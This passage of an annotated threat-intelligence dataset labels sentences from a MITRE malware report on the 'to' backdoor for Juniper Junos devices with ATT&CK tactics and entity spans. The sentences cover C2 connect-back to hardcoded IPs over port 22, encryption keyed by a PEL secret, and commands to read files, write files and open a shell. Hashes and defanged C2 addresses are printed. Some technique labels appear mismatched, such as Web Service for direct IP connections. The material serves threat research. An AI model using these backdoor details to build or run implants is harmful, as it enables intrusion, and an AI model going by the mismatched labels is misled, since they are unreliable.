"end": 65, "label": "Infrastructure_Indicator" }, { "text": "Junos OS", "start": 129, "end": 137, "label": "Infrastructure_Indicator" }, { "text": "Juniper Networks' devices.", "start": 180, "end": 206, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p26-s401-e3f60b", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 26, "sentence_id": 401, "context_before": "Junos OS Specific Actions The hardcoded interface name ge-0/2/8.0 is an indicator that this implant is designed specifically for Junos OS since this interface is available only on Juniper Networks' devices.", "sentence_text": "There are no other indicators of specific actions taking place that are specific to Junos OS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p26-s403-1bfe56", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 26, "sentence_id": 403, "context_before": "TooObvious (to)", "sentence_text": "The implant to is a modified version of the Tiny SHell open-source malware.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "TooObvious (to) implant as modified Tiny SHell version", "entities": [ { "text": "implant to", "start": 4, "end": 14, "label": "MalwareTool" }, { "text": "Tiny SHell open-source malware.", "start": 44, "end": 75, "label": "MalwareTool" }, { "text": "modified version", "start": 20, "end": 36, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p26-s404-7b5117", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 26, "sentence_id": 404, "context_before": "The implant to is a modified version of the Tiny SHell open-source malware.", "sentence_text": "The sample received from the field was a stripped version of the appid implant.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Stripped version of appid implant deployed in field", "entities": [ { "text": "appid implant", "start": 65, "end": 78, "label": "MalwareTool" }, { "text": "stripped version", "start": 41, "end": 57, "label": "Action" }, { "text": " sample received from the field", "start": 3, "end": 34, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p26-s405-d4a752", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 26, "sentence_id": 405, "context_before": "The sample received from the field was a stripped version of the appid implant.", "sentence_text": "Most of the core functionality of this implant is derived from Tiny SHell.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "Core functionality derived from Tiny SHell malware", "entities": [ { "text": "implant", "start": 39, "end": 46, "label": "MalwareTool" }, { "text": "Tiny SHell.", "start": 63, "end": 74, "label": "Infrastructure_Indicator" }, { "text": " core functionality of this implant is derived from", "start": 11, "end": 62, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p26-s406-1db802", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 26, "sentence_id": 406, "context_before": "Most of the core functionality of this implant is derived from Tiny SHell.", "sentence_text": "The source code for Tiny SHell can be found here: https://github.com/creaktive/tsh.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p26-s407-7b64d8", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 26, "sentence_id": 407, "context_before": "The source code for Tiny SHell can be found here: https://github.com/creaktive/tsh.", "sentence_text": "Besides this, to implant contains multiple hard-coded IP addresses which it attempts to connect back to at random.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Connect to multiple hard-coded IP addresses at random", "entities": [ { "text": " to implant", "start": 13, "end": 24, "label": "MalwareTool" }, { "text": "hard-coded IP addresses", "start": 43, "end": 66, "label": "Infrastructure_Indicator" }, { "text": "attempts to connect back to at random.", "start": 76, "end": 114, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p26-s408-405391", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 26, "sentence_id": 408, "context_before": "Besides this, to implant contains multiple hard-coded IP addresses which it attempts to connect back to at random.", "sentence_text": "The to implant is a stripped version of the appid implant.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "TooObvious implant as stripped version of appid", "entities": [ { "text": "to implant", "start": 4, "end": 14, "label": "MalwareTool" }, { "text": "appid implant", "start": 44, "end": 57, "label": "MalwareTool" }, { "text": "stripped version", "start": 20, "end": 36, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p26-s409-aa36ae", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 26, "sentence_id": 409, "context_before": "The to implant is a stripped version of the appid implant.", "sentence_text": "Along with this difference, the IP addresses which are hard coded in the to implant seem to be different from those found in appid.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Different hard-coded IP addresses in to implant variant", "entities": [ { "text": "to implant", "start": 73, "end": 83, "label": "MalwareTool" }, { "text": "appid.", "start": 125, "end": 131, "label": "MalwareTool" }, { "text": " IP addresses which are hard coded", "start": 31, "end": 65, "label": "Infrastructure_Indicator" }, { "text": "different from those found in appid.", "start": 95, "end": 131, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p26-s410-8950a2", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 26, "sentence_id": 410, "context_before": "Along with this difference, the IP addresses which are hard coded in the to implant seem to be different from those found in appid.", "sentence_text": "Besides this, both implants have identical functionality.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p27-s411-09e4b1", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 27, "sentence_id": 411, "context_before": "Besides this, both implants have identical functionality.", "sentence_text": "Executable File Details Title Description File Name to File Path /usr/sbin/to File Type to: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 6.4, stripped File Size 53820 bytes SHA1 01735bb47a933ae9ec470e6be737d8f646a8ec66", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Deployment of to executable with detailed file artifacts", "entities": [ { "text": "to File Path", "start": 52, "end": 64, "label": "MalwareTool" }, { "text": "/usr/sbin/to", "start": 65, "end": 77, "label": "Infrastructure_Indicator" }, { "text": "ELF 32-bit LSB executable", "start": 92, "end": 117, "label": "Infrastructure_Indicator" }, { "text": "FreeBSD", "start": 143, "end": 150, "label": "Infrastructure_Indicator" }, { "text": "SHA1 01735bb47a933ae9ec470e6be737d8f646a8ec66", "start": 255, "end": 300, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p27-s412-a25945", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 27, "sentence_id": 412, "context_before": "Executable File Details Title Description File Name to File Path /usr/sbin/to File Type to: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 6.4, stripped File Size 53820 bytes SHA1 01735bb47a933ae9ec470e6be737d8f646a8ec66", "sentence_text": "Hash SHA256 e1de05a2832437ab70d36c4c05b43c4a57f856289224bbd41182deea978400ed Hash ssdeep 768:CccHS1XhZkoAv9VuQ9FE5J9Fd2j79dX9iEbasKO8krzREEReahodS4A/:QeWH9ZH9l9D9KO8m hash zREqsdS4A/ Implant Analysis This implant is based on the Tiny SHell open-source UNIX backdoor.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "to implant based on Tiny SHell UNIX backdoor with hash identifiers", "entities": [ { "text": "implant", "start": 205, "end": 212, "label": "MalwareTool" }, { "text": "Tiny SHell open-source UNIX backdoor", "start": 229, "end": 265, "label": "MalwareTool" }, { "text": "SHA256 e1de05a2832437ab70d36c4c05b43c4a57f856289224bbd41182deea978400ed", "start": 5, "end": 76, "label": "Infrastructure_Indicator" }, { "text": "ssdeep 768:CccHS1XhZkoAv9VuQ9FE5J9Fd2j79dX9iEbasKO8krzREEReahodS4A/:QeWH9ZH9l9D9KO8m hash zREqsdS4A/", "start": 82, "end": 182, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p27-s413-136abc", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 27, "sentence_id": 413, "context_before": "Hash SHA256 e1de05a2832437ab70d36c4c05b43c4a57f856289224bbd41182deea978400ed Hash ssdeep 768:CccHS1XhZkoAv9VuQ9FE5J9Fd2j79dX9iEbasKO8krzREEReahodS4A/:QeWH9ZH9l9D9KO8m hash zREqsdS4A/ Implant Analysis This implant is based on the Tiny SHell open-source UNIX backdoor.", "sentence_text": "Most of the core functionality of this implant can be understood by looking at the Tiny SHell source code.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p27-s414-97d0d0", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 27, "sentence_id": 414, "context_before": "Most of the core functionality of this implant can be understood by looking at the Tiny SHell source code.", "sentence_text": "This section will focus on the modifications made to Tiny SHell by the malware author to make it useful.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p27-s415-8567bd", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 27, "sentence_id": 415, "context_before": "This section will focus on the modifications made to Tiny SHell by the malware author to make it useful.", "sentence_text": "Artifacts Found\nArtifact Name Description PEL secret A hardcoded secret was found at virtual address 0xc8055a6c with value 88-e8b17616fbbd SOCKS secret A hardcoded secret was found at virtual address 0xc8055a70 with value fb-75c043b82127 Connect Back IP1 A hardcoded IP address was found at virtual address 0x08055a88 with value \"101[.]100[.]182[.]122\" Connect Back IP2 A hardcoded IP address was found at virtual address 0x08055a98 with value \"118[.]189[.]188[.]122\" Connect Back IP3", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p27-s416-427a4b", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 27, "sentence_id": 416, "context_before": "Artifacts Found\nArtifact Name Description PEL secret A hardcoded secret was found...", "sentence_text": "A hardcoded IP address was found at virtual address 0x08055aa8 with value \"158[.]140[.]135[.]244\" Connect Back IP4 A hardcoded IP address was found at virtual address 0x08055ab8 with value \"8[.]222[.]225[.]8\" Connect Back A hardcoded Interface was found at virtual address Interface 0x08055a74 with value \"ge/0/2/8.0\".", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p27-s417-17c487", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 27, "sentence_id": 417, "context_before": "A hardcoded IP address was found at virtual address 0x08055aa8 with value \"158[.]140[.]135[.]244\" Connect Back IP4 A hardcoded IP address was found at virtual address 0x08055ab8 with value \"8[.]222[.]225[.]8\" Connect Back A hardcoded Interface was found at virtual address Interface 0x08055a74 with value \"ge/0/2/8.0\".", "sentence_text": "This interface is a Juniper specific one Connect Back Port A hardcoded port value was found at virtual address 0x08055a64 with value \"22\" Challenge Value A hardcoded 16-byte challenge value was found at virtual address 0x080531cc with value", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" }, { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Juniper-specific interface with port 22 and challenge value for C2", "entities": [ { "text": "interface is a Juniper specific", "start": 5, "end": 36, "label": "Infrastructure_Indicator" }, { "text": "Port", "start": 54, "end": 58, "label": "Infrastructure_Indicator" }, { "text": "22", "start": 134, "end": 136, "label": "Infrastructure_Indicator" }, { "text": "virtual address 0x08055a64", "start": 95, "end": 121, "label": "Infrastructure_Indicator" }, { "text": "virtual address 0x080531cc", "start": 203, "end": 229, "label": "Infrastructure_Indicator" }, { "text": "16-byte challenge", "start": 166, "end": 183, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p28-s418-9ff3ef", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 28, "sentence_id": 418, "context_before": "This interface is a Juniper specific one Connect Back Port A hardcoded port value was found at virtual address 0x08055a64 with value \"22\" Challenge Value A hardcoded 16-byte challenge value was found at virtual address 0x080531cc with value", "sentence_text": "\\x58\\x90\\xae\\x86\\xf1\\xb9\\x1c\\xf6\\x29\\x83\\x95\\x71\\\nx1d\\xde\\x58\\x0d\nMalware Activation Logic The to implant sets up global variables to contain the various hard-coded IP addresses listed in the artifacts section.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Setup global variables with hard-coded C2 IP addresses and challenge value", "entities": [ { "text": "to implant", "start": 95, "end": 105, "label": "MalwareTool" }, { "text": "sets up global variables", "start": 106, "end": 130, "label": "Action" }, { "text": "hard-coded IP addresses", "start": 154, "end": 177, "label": "Infrastructure_Indicator" }, { "text": "\\x58\\x90\\xae\\x86\\xf1\\xb9\\x1c\\xf6\\x29\\x83\\x95\\x71\\\nx1d\\xde\\x58\\x0d", "start": 0, "end": 65, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p28-s419-1aa2ee", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 28, "sentence_id": 419, "context_before": "\\x58\\x90\\xae\\x86\\xf1\\xb9\\x1c\\xf6\\x29\\x83\\x95\\x71\\\nx1d\\xde\\x58\\x0d\nMalware Activation Logic The to implant sets up global variables to contain the various hard-coded IP addresses listed in the artifacts section.", "sentence_text": "Further, it attempts to read the value stored in the eth environment variable and stores this value in a global variable (to indicate the outbound interface).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p28-s420-7d7bdd", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 28, "sentence_id": 420, "context_before": "Further, it attempts to read the value stored in the eth environment variable and stores this value in a global variable (to indicate the outbound interface).", "sentence_text": "Finally, it sets the connection port to 22, presumably to mask any outbound connections to C2 servers as legitimate SSH connections.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" } ], "procedure": "Set connection port to 22 to mask C2 as SSH traffic", "entities": [ { "text": "sets the connection port to 22", "start": 12, "end": 42, "label": "Action" }, { "text": "mask any outbound connections to C2 servers as legitimate SSH", "start": 58, "end": 119, "label": "Action" }, { "text": "port to 22", "start": 32, "end": 42, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p28-s421-287ccf", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 28, "sentence_id": 421, "context_before": "Finally, it sets the connection port to 22, presumably to mask any outbound connections to C2 servers as legitimate SSH connections.", "sentence_text": "Connect to C2 The to implant then selects one of the 4 \"Connect Back\" IPs to connect to at random.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Randomly select one of 4 Connect Back IPs for C2 connection", "entities": [ { "text": "to implant", "start": 18, "end": 28, "label": "MalwareTool" }, { "text": "Connect to C2", "start": 0, "end": 13, "label": "Action" }, { "text": "selects one of the 4 \"Connect Back\" IPs to connect to at random", "start": 34, "end": 97, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p28-s422-8e498d", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 28, "sentence_id": 422, "context_before": "Connect to C2 The to implant then selects one of the 4 \"Connect Back\" IPs to connect to at random.", "sentence_text": "Then it creates a TCP socket to connect to this address.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Create TCP socket to connect to selected C2 address", "entities": [ { "text": "creates a TCP socket", "start": 8, "end": 28, "label": "Action" }, { "text": "connect to this address.", "start": 32, "end": 56, "label": "Action" }, { "text": "TCP socket", "start": 18, "end": 28, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p28-s423-bf7677", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 28, "sentence_id": 423, "context_before": "Then it creates a TCP socket to connect to this address.", "sentence_text": "After this is done, the outbound interface for the socket is set to the value obtained from the eth environment variable.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" } ], "procedure": "Set outbound interface from eth environment variable for socket", "entities": [ { "text": "outbound interface for the socket is set", "start": 24, "end": 64, "label": "Action" }, { "text": "eth environment variable.", "start": 96, "end": 121, "label": "Infrastructure_Indicator" }, { "text": "outbound interface", "start": 24, "end": 42, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p28-s424-5f3f75", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 28, "sentence_id": 424, "context_before": "After this is done, the outbound interface for the socket is set to the value obtained from the eth environment variable.", "sentence_text": "If the connection is successful, the implant then attempts to connect to the C2 in server mode.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Connect to C2 in server mode after successful connection", "entities": [ { "text": "implant", "start": 37, "end": 44, "label": "MalwareTool" }, { "text": " attempts to connect to the C2 in server mode.", "start": 49, "end": 95, "label": "Action" }, { "text": "server mode.", "start": 83, "end": 95, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p28-s425-52b98d", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 28, "sentence_id": 425, "context_before": "If the connection is successful, the implant then attempts to connect to the C2 in server mode.", "sentence_text": "Otherwise, the to becomes the server and becomes ready to receive commands from the C2.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "Become C2 server and ready to receive commands", "entities": [ { "text": "becomes the server", "start": 18, "end": 36, "label": "Action" }, { "text": "ready to receive commands from the C2.", "start": 49, "end": 87, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p28-s426-39feca", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 28, "sentence_id": 426, "context_before": "Otherwise, the to becomes the server and becomes ready to receive commands from the C2.", "sentence_text": "From the decompiled sources of to it seems only this execution path is taken.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p28-s427-692cdd", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 28, "sentence_id": 427, "context_before": "From the decompiled sources of to it seems only this execution path is taken.", "sentence_text": "This means that this implant is intended to act as a command-receiving server.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "Implant intended to act as command-receiving server", "entities": [ { "text": "implant", "start": 21, "end": 28, "label": "MalwareTool" }, { "text": " act as a command-receiving server.", "start": 43, "end": 78, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p28-s428-4f9142", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 28, "sentence_id": 428, "context_before": "This means that this implant is intended to act as a command-receiving server.", "sentence_text": "Activate and Listen for Commands Once the to is started in server mode, it receives 1 byte from the C2 client using the pel_recv_msg() API from TinySHell.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "Receive 1 byte from C2 client using pel_recv_msg() API in server mode", "entities": [ { "text": "receives 1 byte from the C2 clien", "start": 75, "end": 108, "label": "Action" }, { "text": "pel_recv_msg() API", "start": 120, "end": 138, "label": "Infrastructure_Indicator" }, { "text": "TinySHell.", "start": 144, "end": 154, "label": "Infrastructure_Indicator" }, { "text": "server mode", "start": 59, "end": 70, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p28-s429-4cec82", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 28, "sentence_id": 429, "context_before": "Activate and Listen for Commands Once the to is started in server mode, it receives 1 byte from the C2 client using the pel_recv_msg() API from TinySHell.", "sentence_text": "If this receive is successful, the command processing logic can begin.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p28-s430-0a08e4", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 28, "sentence_id": 430, "context_before": "If this receive is successful, the command processing logic can begin.", "sentence_text": "This single byte message contains the action to be taken by the implant.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "Single byte message contains action for implant execution", "entities": [ { "text": "single byte message", "start": 5, "end": 24, "label": "Infrastructure_Indicator" }, { "text": " contains the action to be taken", "start": 24, "end": 56, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p28-s431-89040e", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 28, "sentence_id": 431, "context_before": "This single byte message contains the action to be taken by the implant.", "sentence_text": "These actions are explained in the Command Details section below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p28-s432-6ac643", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 28, "sentence_id": 432, "context_before": "These actions are explained in the Command Details section below.", "sentence_text": "Note that the to server created in this situation is initialized using the pel_server_init() API from Tiny SHell using the \"PEL secret\" in the \"Artifacts Found\" section above.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "Initialize to server using pel_server_init() API with PEL secret", "entities": [ { "text": "to server", "start": 14, "end": 23, "label": "MalwareTool" }, { "text": "initialized using the pel_server_init() API", "start": 53, "end": 96, "label": "Action" }, { "text": "Tiny SHell", "start": 102, "end": 112, "label": "Infrastructure_Indicator" }, { "text": "PEL secret", "start": 124, "end": 134, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p28-s433-0d21b9", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 28, "sentence_id": 433, "context_before": "Note that the to server created in this situation is initialized using the pel_server_init() API from Tiny SHell using the \"PEL secret\" in the \"Artifacts Found\" section above.", "sentence_text": "This serves as the encryption/decryption key for the aes_encrypt() and aes_decrypt() routines in TinyShell.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Use PEL secret as encryption key for aes_encrypt()/aes_decrypt() routines", "entities": [ { "text": "encryption/decryption key", "start": 19, "end": 44, "label": "Infrastructure_Indicator" }, { "text": "aes_encrypt() and aes_decrypt() routines", "start": 53, "end": 93, "label": "Infrastructure_Indicator" }, { "text": "TinyShell.", "start": 97, "end": 107, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p28-s434-55277b", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 28, "sentence_id": 434, "context_before": "This serves as the encryption/decryption key for the aes_encrypt() and aes_decrypt() routines in TinyShell.", "sentence_text": "Command Details\nLike previously seen malware implants, to at its core is a Remote Access Toolkit (RAT) based on Tiny SHell.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p28-s435-4b172a", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 28, "sentence_id": 435, "context_before": "Command Details\nLike previously seen malware implants, to at its core is a Remote Access Toolkit (RAT) based on Tiny SHell.", "sentence_text": "It uses the following Tiny SHell APIs to perform the corresponding actions:\n1. tshd_get_file() - Read a file.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Read file using tshd_get_file() API", "entities": [ { "text": "Read a file.", "start": 97, "end": 109, "label": "Action" }, { "text": " tshd_get_file()", "start": 78, "end": 94, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p28-s436-8f69ab", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 28, "sentence_id": 436, "context_before": "It uses the following Tiny SHell APIs to perform the corresponding actions:\n1. tshd_get_file() - Read a file.", "sentence_text": "2. tshd_put_file() - Write a file.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Write file using tshd_put_file() API", "entities": [ { "text": "Write a file.", "start": 21, "end": 34, "label": "Action" }, { "text": "tshd_put_file() ", "start": 3, "end": 19, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p28-s437-995816", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 28, "sentence_id": 437, "context_before": "2. tshd_put_file() - Write a file.", "sentence_text": "3. tshd_runshell() - Start a shell.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Start shell using tshd_runshell() API", "entities": [ { "text": "Start a shell.", "start": 21, "end": 35, "label": "Action" }, { "text": "tshd_runshell()", "start": 3, "end": 18, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p28-s438-b018ed", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 28, "sentence_id": 438, "context_before": "3. tshd_runshell() - Start a shell.", "sentence_text": "The details of these commands can be understood from the Tiny SHell sources.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p28-s439-00c968", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 28, "sentence_id": 439, "context_before": "The details of these commands can be understood from the Tiny SHell sources.", "sentence_text": "However, there seem to be two new APIs introduced to Tiny SHell which are used to create a SOCKS proxy and update the in-memory configuration of the to implant.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Create SOCKS proxy and update in-memory configuration via new APIs", "entities": [ { "text": "create a SOCKS proxy", "start": 82, "end": 102, "label": "Action" }, { "text": "update the in-memory configuration", "start": 107, "end": 141, "label": "Action" }, { "text": "to implant.", "start": 149, "end": 160, "label": "MalwareTool" }, { "text": "new APIs", "start": 30, "end": 38, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p28-s440-6da09c", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 28, "sentence_id": 440, "context_before": "However, there seem to be two new APIs introduced to Tiny SHell which are used to create a SOCKS proxy and update the in-memory configuration of the to implant.", "sentence_text": "Command 1: tshd_get_file()", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Execute tshd_get_file() command for file reading", "entities": [ { "text": "Command 1", "start": 0, "end": 9, "label": "Infrastructure_Indicator" }, { "text": "tshd_get_file()", "start": 11, "end": 26, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p28-s441-7e8a6b", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 28, "sentence_id": 441, "context_before": "Command 1: tshd_get_file()", "sentence_text": "As the name suggests, this command is used to read an arbitrary file from the file system.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Read arbitrary file from file system", "entities": [ { "text": "read an arbitrary file from the file system.", "start": 46, "end": 90, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p28-s442-def127", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 28, "sentence_id": 442, "context_before": "As the name suggests, this command is used to read an arbitrary file from the file system.", "sentence_text": "More details on this can be obtained by looking at the Tiny SHell source code here:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p29-s443-b3e2b7", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 29, "sentence_id": 443, "context_before": "More details on this can be obtained by looking at the Tiny SHell source code here:", "sentence_text": "Command 2: tshd_put_file()", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Execute tshd_put_file() command for file writing", "entities": [ { "text": "Command 2", "start": 0, "end": 9, "label": "Infrastructure_Indicator" }, { "text": "tshd_put_file()", "start": 11, "end": 26, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p29-s444-b156e2", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 29, "sentence_id": 444, "context_before": "Command 2: tshd_put_file()", "sentence_text": "As the name suggests, this command is used to write an arbitrary file on the file system.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Write arbitrary file to file system", "entities": [ { "text": "write an arbitrary file on the file system", "start": 46, "end": 88, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p29-s445-69238e", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 29, "sentence_id": 445, "context_before": "As the name suggests, this command is used to write an arbitrary file on the file system.", "sentence_text": "More details on this command can be obtained by looking at the Tiny SHell source code here:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p29-s446-1efcfe", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 29, "sentence_id": 446, "context_before": "More details on this command can be obtained by looking at the 